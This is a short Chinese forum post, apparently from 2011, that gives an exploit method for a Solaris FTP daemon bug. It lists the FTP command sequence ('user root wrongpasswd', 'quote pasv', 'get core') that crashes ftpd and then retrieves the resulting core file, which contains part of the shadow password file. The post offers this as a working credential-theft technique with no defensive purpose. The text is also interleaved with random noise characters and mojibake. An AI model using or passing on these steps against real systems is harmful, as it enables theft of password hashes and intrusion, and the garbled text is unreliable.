該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG��,使得用戶可以獲得該機(jī)的口令文件�。具體過程如下:
+ J2 H* F. W* W6 K7 p3 G; l( D% c
% c; _2 V- A* \9 `1 R1.通過 ftp 正常登錄到目的主機(jī)上. Y; f2 F- m) @4 T0 z' z8 i
3 u+ c9 D* L2 _& q y+ M% v* G( n2.輸入如下命令序列:
1 \4 p, ]* }' S. q w
- `) k" t0 I! L! i+ O# Xftp> user root wrongpasswd7 a. m/ ~4 C* y1 N- |
1 s: ^- j$ w% A8 p7 U' p" W7 u
ftp> quote pasv, n6 H- f/ I0 j; F: Z
6 v0 U8 j* }- d3.這時(shí),ftpd會(huì)報(bào)錯(cuò)退出�����,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core,口令文件就包含在這個(gè)core中�。& j7 @' F1 F F4 N" y9 Y2 x7 ?
9 G- S* F% ?( O6 M* H: G4 S' z' H7 {
4.再次進(jìn)入FTP >get core
% b" j4 o1 \8 {, u! k, W& K# t: C
1 d% I7 z( D; ^- g& n補(bǔ)充:雖然在core只有一部分shadow,但是對(duì)于系統(tǒng)來說已經(jīng)是致命的打擊了( J4 T& h; A! v. J {+ o7 l
! ?9 N4 Q3 X8 V3 H h: b4 o |
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡